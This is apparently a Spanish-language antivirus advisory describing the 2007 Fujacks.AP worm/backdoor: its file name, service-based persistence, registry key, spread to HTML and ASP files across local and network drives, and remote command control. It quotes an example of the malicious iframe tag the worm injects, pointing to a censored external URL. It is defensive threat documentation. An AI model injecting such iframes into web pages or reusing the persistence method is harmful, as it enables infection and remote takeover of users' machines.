|
W32/Fujacks.AP
Fujacks.AP es un gusano/backdoor residente en memoria reportado el 08 de Agosto del 2007 que se propaga a través del puerto TCP 80 u 8080 (HTTP).Inserta una etiqueta Iframe en los archivos HTML y ASP, la misma que contiene un enlace URL.
Permanece activo en segundo plano, para que haciendo uso de su servidor Backdoor y con el enlace de la etiqueta Iframe se podrá conectar via HTTP a determinado URL, desde el cual los intrusos podrán ejecutar comandos arbitrarios o controlar en forma remota a los sistemas infectados.
Infecta Windows 98/Me/NT/2000/XP y Server 2003, está desarrollado en MS Visual C++, con una extensión variable y comprimido con rutinas propias.
Al ser activado se copia al directorio %System% con el nombre de ntsokele.exe el cual es registrado como un nuevo servicio del sistema, con el nombre de "Rasautol" y que muestra el título "Remote Help Session Manager" con funciones de Inicio automático, de modo que se activará cada vez que se reinicie el sistema.
para asegurar esta activación crea la llave:
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Rasautol]
%System% es la variable C:\Windows\System para Windows 95/98/Me, C:\Winnt\System32 para Windows NT/2000 y C:\Windows\System32 para Windows XP y Windows Server 2003.
Al siguiente inicio del equipo el gusano inserta su etiqueta Iframe en los archivos HTML y ASP de todas las carpetas de las unidades de disco del sistema, además de las de las estaciones de trabajo, en caso de tratarse de una Red Local (LAN).
Como Backdoor se conecta a través de los puertos TCP 80 u 8080 al URL contenido en el Iframe, desde el cual los intrusos ejecutarán comandos arbitrarios o podrán controlar en forma remota a los sistemas infectados.
Ejemplo de etiqeta Iframe:
<iframe src="http://www.[Censurado].com/files/fuckjack.html" AllowTransparency frameborder="0" framespacing="0" scrolling="none" border="0"> </iframe>
PER ANTIVIRUS® versión 10.2 con registro de virus al 08 de Agosto del 2007 detecta y elimina este gusano/backdoor.
